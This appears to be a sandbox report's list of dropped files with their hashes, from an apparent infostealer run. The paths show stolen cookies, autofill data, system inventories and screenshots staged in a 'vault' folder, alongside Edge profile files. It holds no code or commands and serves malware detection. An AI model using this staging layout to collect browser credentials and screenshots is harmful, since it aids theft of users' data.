SHA512 8e5e12daf11f9f6e73fb30f563c8f2a64bbc7bb9deffe4969e23081ec1c4073cdf6c74e8dbcc65a271142083ad8312ec7d59505c90e718a5228d369f4240e1da

C:\Users\Admin\AppData\Local\Temp\autofill_db_r4lc

MD5 87210e9e528a4ddb09c6b671937c79c6
SHA1 3c75314714619f5b55e25769e0985d497f0062f2
SHA256 eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512 f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

C:\Users\Admin\AppData\Roaming\vault\credentials\cookies.txt

MD5 5b5960b14e70d49b614ba2213dc33fdb
SHA1 2524290ed4ac0103e232d665dfba0b3ff45055d2
SHA256 9af789f15da241ae5f9120585b5b6fe15e34f563624e13fd6ed66ea2ec63e445
SHA512 214e1577f7d5cdb8a16eeacb4f543eec9bfa7d7e9e9a158fea7c4f52a5019078a6c86db82fcbd5a5c5a2a804322c7f89a2e3c9bf6e1be4c76cde395891c837e0

C:\Users\Admin\AppData\Roaming\vault\system\installed_apps.txt

MD5 5fd483cf837a8e5b3ea876f243cba088
SHA1 7e40ccd259597bb6d07806f1a4b426de527b0b04
SHA256 eb3cfdad01fbaf4dd9a132fcb5a894efcf030c1dbe8e4c337d325a28d63e35c3
SHA512 aaebac3373ea3f3261598e81e02a9eb3e484e6890727cd5e04aad592ee24df1ac9fcee08b350c1e755a5565a427f5a17123b169e930e47667c3623936e6fd4b7

C:\Users\Admin\AppData\Roaming\vault\system\machineinfo.txt

MD5 d81784933ce7be40ba8397da98902f77
SHA1 16cf4e076d58b36eca50e8fa4d9341e003be318f
SHA256 8429a7c971d3a886cc39de353f73a8a27eb4e8550ae949db419d1f5c0c2bd2a8
SHA512 755c14aed1b311cbc8f2d1d8a79b56c4e046e2137bbccc4ea7a1b421a9214be34e207673f3d5a0442434fe006df87c4ba33f835abee9a703ad0a64b2f1cf79e0

C:\Users\Admin\AppData\Roaming\vault\system\tasklist.txt

MD5 bbbd3ca717b6179d83647586139ca22c
SHA1 f75c29afe0c4475470258bcf6f5633aa0511eabd
SHA256 3177279244068f4461be94676ba852623847a697b5ab734c85e9293024fce90d
SHA512 2f9909023b9f203b7214b95a8fbd5efdd54aba8e0edcb3f2444a7e3afd448962ca9c2ced4821878dec3a86f37b83abc69682dfb30991634c50c3b93e12879f92

C:\Users\Admin\AppData\Roaming\vault\system\tree.txt

MD5 b8a3392b978ab66524bb4c995ed4f63e
SHA1 cc6e60781e757731654f239a584e328275bd29a3
SHA256 94a4ce0a99c28994f43dde0671114ab22108800aec82049f9638f0a873633a22
SHA512 4d1df1b5950bdcbfe9927fe51daa385753948f0cfe1994b5a38939b6a6624353928dbae859651ad64087b690e7fa5703c61637a81fee23cad6d30cb508b07c0d

C:\Users\Admin\AppData\Roaming\screenshots\sss_2451.png

MD5 d1e1337ecac0b062f3e48cf15c55e1e6
SHA1 5b7d0cef87e98c27c783ebbe4c7f098e0062f96d
SHA256 2329e82018552572b52de1633fc0883e9341a0bba37d2831de14fa6d77d9e8ce
SHA512 50e6102f4258f80945f641840db701dcc8e61df7179d398eb60112d47d573ddc00123f341a57d582a529ce66619755d41aa86a499899713582927d6eccc40c9c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a28bb0d36049e72d00393056dce10a26
SHA1 c753387b64cc15c0efc80084da393acdb4fc01d0
SHA256 684d797e28b7fd86af84bfb217d190e4f5e03d92092d988a6091b2c7bbbd67c1
SHA512 20940fee33aa2194c36a3db92d4fd314ce7eacc2aa745abec62aa031c2a53ba4ff89f2568626e7bd2536090175f8d045c3bb52c5faa5ecc8da8410ab5fc519f7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 554d6d27186fa7d6762d95dde7a17584
SHA1 93ea7b20b8fae384cf0be0d65e4295097112fdca
SHA256 2fa6145571e1f1ece9850a1ac94661213d3e0d82f1cef7ac1286ff6b2c2017cb
SHA512 57d9008ccabc315bd0e829b19fe91e24bab6ef20bcfab651b937b0f38eec840b58d0aed092a3bbedd2d6a95d5c150372a1e51087572de55672172adc1fc468a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c08f7091-16cd-40a2-8ad6-92320381be34.tmp

MD5 ba9372b2266f4cc2d801b319ab7a2d49
SHA1 4250d7f400c2c1a68664a193ddee72bdd673c136
SHA256 9c277785acccd5e4ccf480f569791e74fb88a47757782b8957ad1ecc73167af8
SHA512 d65826bf1864145a47911422f1c6028217863ceb814039fefe55b126333a81e376dda081314415d728a7eb68c37cf0f1eaf133b471663f5bcdce454c30a6c44a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 56a650f852da8f3347da0093beb82b03
SHA1 0fa81e89daf1a424d95113199704e7d51322b15b
SHA256 b4f2484918a5b8c9fdea614a54a19adfe64c31ecc387cbcfc1a1e7f6631d7519
SHA512 0882d39bc767c35e3fca7c58f9084a03f4d27fc095deb8352646d37381cab5ca660402bb68b72a5e1653a5d7eea8cf5e93341ddc42c2289c3eab69ecf3a82119

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5db47e.TMP

MD5 375643f810689829ef5f56471463c680
SHA1 6d17b1315bfa741888f18acf930c7e5c5d098942
SHA256 56ccc95df72fa299881a5877a3b403a5e5229f430ffb6ab5a89461fabf46f2b6
SHA512 5971eea65dd7a88ff18d6725c777341d4eb6bb0fecf55c68028034a84d1416e374385a534aa94a895ca188367fd1b7722447ef97ab6a9d17e6c42a21baac6b82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 7f543f4e1f18bea5dc2155c3cb65bc36
SHA1 3252a83ca282a0a8fb0c0967fff3f8623f331a73
SHA256 1f1b15e198a7d4c86dc2fe84b3938cd09ebb3a4c9dcbe6d6a6bf97e0ed06fa6c
SHA512 a6b91b7c9d53f691ddd6946542c89f542e86ae38d7b1b2522e0d8bfaacd21e0daaa6e31042cc9d33fa40347d08b7cac6799a427ead64f0b0c57b8d848c2d6247

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5d69b9ab429111c1d1b9a51156025f38
SHA1 53496c8126259b53b1658d0dab222d3d5cca1cec
SHA256 24c15f8971a0b8da6b49b2ba69d246cf01d67250c6403f4b566a06e10f8500eb
SHA512 f1da2597325179d87030f8ae3283b100c9afb661b54491a9dfe2067939c33b406d782d01ecadc6bb0e58eadb80540790592da1bf59d224239a9673bb76b7d742

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 38b27eac7dc38d5981cad50c494d9275
SHA1 62619e16d90d1f85ce7d82da176e91107f961603
SHA256 088fe3b272f89c71ea8371de88c38ddf874b466d8d2f6e2d91488523bf0267c8
SHA512 48d9f06586f124a889754a7bb27390b8772e037cacd18f88edb51a3d868961fba5e0861427d113e9281d9c8eb5deb4336ad6b318fd5e873c2b274b35b5420c44

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4ac031e303edaffa249d301757971088
SHA1 fbc328574ab0a0122e70d11bc4e523d103c643c0
SHA256 cafdf8e2735a704bf4b14e005baa3b6f2d68ac80f50d35562055644706da4e7e
SHA512 6437c87c6d8eae40b2c5be6b40e4cfd030af09cc2d268a41be349c8270530b2e7833d61a59d385c277e92542b47265415eaede40f2642430a5c7a76cd92e7a5d

C:\Users\Admin\AppData\Roaming\screenshots\7816.png

MD5 419cbfa9158c6b005454baa225fe7344
SHA1 7042dfb984c8762a1768b43194d4e39ed983988b
SHA256 dd19d741c4281956284331bfe02b38fc6f20269b975a988b000064cb33f9303a
SHA512 4a1e783e435c2ee39d059ffb92d690983486a606e14f321db7f6d801123ecc2c38042d97353e7c5a8fec6bb2664d140442e4414157f6a9c9545f46506112b58b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 aa55c2c5020845e06c4f487995c57430
SHA1 23a7e68fa92050a3c9fed3cefd955448a669b43c
SHA256 cbc515b56eac12d7df435ff4a308f5cd18777b68c4db2d78ea1bdbc3d8e94fb0
SHA512 2bf1d2de0bab481154ee5aaf5e7ed9446c82891476455af0b7b4bdcaf38b4bd7c967742459ea93d7a7b3993c426bfb8679b8efe9f672fe590171451519ce751a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5e0472.TMP

MD5 46ca880d273d98fadee02eaf67c2ff67
SHA1 7563ac516bd5e5b6edc8ea52eccd77d71064a14f
SHA256 5a282b662d7627019fb2df189c8df7c8139131e338841be6e37ffc6e2b9f17f1
SHA512 a1a0e26d37262ea75c26052413c462d83ca77aa2889a9b9bfd3a2274551c493a8520cef576316f5a5850ff03b350f9989a43fed749b0ef2c37e77dc0756433ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7b0127ff836db5b7c866cd3d7e577b6c
SHA1 dbac52794b46168eecd376a4cfe376c66a5fb79b
SHA256 cc9dd3d2c8dfc9a27e11054ac9b5ed82692442f9c51d0c85f34a0dcf3caa239a
SHA512 49c50dff3af6d4f63776f1524650f864a79f6b6609079d6d3642abd6e8f8f0df4031b5eb0adb599910cf07ef6f8c610fc21f0ddbc1414a767d9fe26b7442d950

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\de0d565e-9d96-4c82-a6c8-46fc5765a45c\index-dir\the-real-index

MD5 d5fbd899bed8430e90c5dadfa1ed9e2b
SHA1 be6d20b467253b71f84d6dfb60db3a37ac9cd813
SHA256 36275742ce34f22c03c196eb0cc291fd1ca150c84837e9e72b91e50fab0515a0
SHA512 b6465fe5a516943361d68cc9353ee8990b3b3e5ba7d8c4daf63a81ff2f95e07d43120154f3c9f76366b651995d4b910ba600b6cc5850c298bc2b7f3b14ee3428

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\de0d565e-9d96-4c82-a6c8-46fc5765a45c\index-dir\the-real-index~RFe5e0f50.TMP

MD5 8623d7ec806825d5a12000ab9b577860
SHA1 325d701f9e724f85157f70cbfccea21fcc7d8c63
SHA256 6d4ac89381d6595cca677f5e3c46c8b7260bf5f0d2b570d39ff5f53fd69427d7
SHA512 749c35baa2ac1ab1339a2c8c3cd9c263660bdf31bb804f2d8fd12c33d7e68f0f4bfea248283ecab7415f42dbd173b1b386151ee7e1f849f1515f407457e53475

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 a8473372aabd8b9099b0f65a5444966b
SHA1 80f191aa1251ce34a792bff355b6656417143403
SHA256 676f51fc89abb4b2fa948a7fd13c71aa6b0b46e558413f3c544f38d7855ce85b
SHA512 dffa2928e56eb1bbbec6061c25f0d32f015ef715045c09e51cb0be2fb13a4315a62f0f5973db381f869945909e2dd4b4aa8d203e6fbc318232ead2e70baba44b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8ec0a32ef60ea0c905c608e954d93e8c
SHA1 638a5037b3fb86af363b8a83083492aac3a478a9
SHA256 c06852932ceaad02c94321ff6e49b2ff8b467b4033f5e6462d0621838fefd80f
SHA512 baf37b9251cc8290f4625584aff7c286d3bddc707a15a7568c2f7483eef6f3812b6fc3f2bd50f864a486bfdc396e4d3b7042401efdfaab328ed122cf5bb355bf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 6a6c43b99815b1e6a6248fc2b3711a9a
SHA1 14db02f83c48cb117aa19ca107dc887423041e25
SHA256 4406e7c0b0895a3d7626b21e2b17575c15763fbbe25aaa4f42f15e240b11d8e9
SHA512 314dc0647309dc0b2a62f84c716137274c3c65a21204d1ab2b46b028749bd1f7d6e59d0f0a208cb9e8300bb13a1870f167d82574d4d9afe8b0e354416b28f27d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5e6436.TMP

MD5 4222be6d93c2389b981eb293d0946dbb
SHA1 733f382d342221f9ca930e3f63a9e0cf6aa05a95
SHA256 c08c016b59de05d167e670f0d3f77944f97ac41fdf3b2452953c0627c943fb82
SHA512 c3e06bee5d5d4e81a4eb1bbdbcd8a7f7775b589e419b52d3f40a96dfe00d0f1c1627bea188dd247f13cc2d4c6fcf531f36a862288bb5973cef0cdde7933f26d7

C:\Users\Admin\AppData\Roaming\screenshots\3547.png

MD5 7813d582a12f8799b8e88182b4f86a68
SHA1 0bd561cab60900db6618fb8b4fc582c905e0fd38
SHA256 8e7cd095adcfc9cc65a32b7f8fe4fb97af76d3b48ecbe4f441588d895ba67b79
SHA512 075d558d159f9b36ffae5e4ca636bafc6b076e92a590de42c33d9fb8cd0f4cb8874feabfe4556dc173ef39092fd0dbd7fc1925f999befae9e03c25222df4a282

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 efe105f83e4f184d23f64eddd317601f
SHA1 1da3b95250aa25e48cca80d165b65049c8152e89
SHA256 c83c9be771a3f37f9290a080ae22004a72104fa28535cbcd95baf366cd848478
SHA512 d2f5022560b0cf19fce05ef35ef6c6a5cf2dfbe70f67a3dbdb07d32865afc71e1ab425307b900b5f65431f96eb8ad9c2c09e0e800ab2095b6e66014ecbd4e600

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 01159ea9f2c97badfdf0d014ccd83b1f
SHA1 9c849142d9138e8c826e060f4546c76ce1a6f0e4
SHA256 46beb6bb79b2a43fd54750076ae29e5a65e183a698aee9eda6300813d5bda8d1
SHA512 b34e6e2e5ef6a0892b95e31dc5a59df648cefcd1f905e576a3ec1970c7d821319f315e78a0a22921a2ec11baf243ec29f48003156418d58186da4869a199d696

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 374b934af766f9823bf836f2098513e8
SHA1 6338942950eb47128739d2cef40d3f1b594fe3d7
SHA256 6b579bc510aab997a5d7a92c23bf9da20df92d6aa6a45886ed7869950a617f92
SHA512 d100f3246d9cd1fd7ea768c696962451218c7f795208715a51a41fc8a17c55f589d8687bb211abc1d6963e800d70ad05d4603e1a86c2ce6e130700c67204cccb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 0c5a131a1ac138f021c45203d6385dd7
SHA1 2922ba9f9f065343f15e8d3f3405a481519b3b61
SHA256 5c680741d2fe9e4414971346fb3ad3243b0560cd8ac1ddb8436ca78b82c32a22
SHA512 3fb3d3c22ddb74c846679009157f86576f3acdf0b30406fbb12fe789b6b4741c9335f7b9a524e69374abc0759495c9eb75db1fcea2696c9c39e6d1ee3d7ee3ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 3f7a46936fa4e6c5c749a80b6e0cb599
SHA1 9d301ba7d2be3cd0e1492ebbed0d06ac6a371369
SHA256 90a8693035974d0ef74e2f215a8983e6a845199216970fd9ae40829f744bcc6a
SHA512 aee1315a8e80deb93233ff5af2737fbf021f4847086e06e4d128c962cd90d4cd1e85d38c1872be976df6e63157e886ca5418f5561e9743a1f71195e09fbf153d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bfc542eb2888e5b1f95150fa3631bcd0
SHA1 017f5b0ce780a2efa5167d45d0bbdab82327969f
SHA256 7a393bdf3cbc76c37c666e32156d84d1d9cf684d9f94e106e76a335e817a61bc
SHA512 0e941b09a51828f2590c2ebc79e571ce30a4910592324a45ee9d7374b8a23cce268c1e9acf89a6dd3f5aaf0a98013b4f415c8167c6115afe23801952413ef5ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 586c31e9b60793c6c1b0fb5e2c8dd5ae
SHA1 902186935cb8fbbd8ae20d32ca63beb0516d6ab3
SHA256 4cf8039260774fc1646b560f181e5782a5c632d0e00e2f73e15619745a5e3ae8
SHA512 5e426d483c212473bd2374785fcee1574cf65bd1e1380bd611b90cee91d562bb53078329361a5d7ab215cedc3736f22ad984497fc3dbd1c7c3f482282bbd7999

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 97330a791be534d4cf00b534ce889f3e
SHA1 ae9b77c865f5f9b72ff45a5bfc3d6a8358e6315c
SHA256 cebcaef3c2bc600b5dbf54ee95e0ad6ee887957e19aa3179f6a59beadb281741
SHA512 96c9a1c8d03d5af1d14358141ae76ba2a405c934801a06c7885ee131736b7207c90be4807059134f86ce47ea7d9f8fcd1e7199e04bcf5248c0b2261f8e58b3e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a3ea509e4851e97c211271cb93f7ee8c
SHA1 1cc9623b4c78eb56ed026f668fb55d0c8d9f2877
SHA256 d83117a40f39c98d670948bb5015edf3eb5125a194822915117a164625028e82
SHA512 3f4a488e381f2eed7e5adedf0f73c832def32591d78c360eaa935ef372f24f5a28d1dac0d69de3f9c6b17586e1c5f99a4b40cfa7d3e1558fad5668c232735279

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3810c4e970ac65f4b7336c05a06fda8c
SHA1 a953df4474bb1430e3120009f0fd34d0e9e6ef15
SHA256 4fbea239343b44193738a584be37874b4103e1c475959479fa4dfa7cb0f97179
SHA512 69150f7aafec33ddda20660fa003ebca8fcc7ebcee17c4ad2bea8de50aa506c60ae669c63aca088d2b30e13c75bae8e501c77e0ebe1a1d1a35dde4ee1cbccf97

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\2c4a1231-d559-4c3c-a2de-80e885046c8e.tmp

MD5 b3f6f60e4713ba74fa737f08308073aa
SHA1 9432a185423db341a7ef4d597e064f3bb0ee3e1d
SHA256 c837107d0d7cd0417c908d70565c7da9c0c290f4f0871e4c3d66e964e4a9ca03
SHA512 b3f913da72913d47174d2677350ced411ebac3be6c7fc7eb1dc29b46ce1fe421ede5a7b1fd7d21a640294042649d77c0777723f30927498bfa262808b2d903c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fea83ef99bd2d8bc4035639c76acf558
SHA1 a1f948cde35249d82b91e95b6de1169d18238a77
SHA256 1a661707aaa3757c6be19691a0bc2550d4f558e0a9e8c88f467b900c5f392a38
SHA512 ecf57a8bf920b0cab37cafe6bd529f05387c8c618f53ddaec8b1ec48f4eb213ca2ddcd5b0522a2b882b4432b41f6667a7b9a084683ff36f2aa8ec3de83723212

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 c8029653414fd64ff93a9b742f63691c
SHA1 eb5555d33a27f71f1879b04cf6b21b2faaa28453
SHA256 bfdcd869a59329f5fec574a3ec29b7f0c31a2d1dac3d4195f4294edea8c1578d
SHA512 817e413b00192f3b8fd9e73cec0d1155d8b014536e58f371bcfdecd15221bee21a9422d84d735dcdbfcb0540c0e751c8fd8cef94288a689db54806e81ecf55c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

MD5 117276628c5c506edb28081cfc8d9aee
SHA1 f8260f95cfc17eda225641163227fa9939882e10
SHA256 1887a296f65f4b8d1f9dec886311c8a095e6e820da9e13ac18c741155d7d9787
SHA512 d379fa153f7945070e51aecc479ec256e34367b4c780c451d95f2fc28c95c3acef8d0039e26ecf39a90e321facca58dfc8cef98c313509eaed635d2bb580ab3a

C:\Users\Admin\AppData\Roaming\screenshots\6290.png

MD5 20158162dec9afe9e0747dc02677526e
SHA1 5874ea264ab99a18bd88fe9c7edd43d727decae8
SHA256 c3a0c709f5d169c9a1edc8db10bc0bb1d2c472b55f398dbd40ba43b56328b3fb
SHA512 c6c5648931b58fc28032ed4a2051303aa872d24c6dc4e2b71cb26b25a95d37a657ba3e39202a009b092daec6c9af87029dcb01df16e22cad5385c1d877146570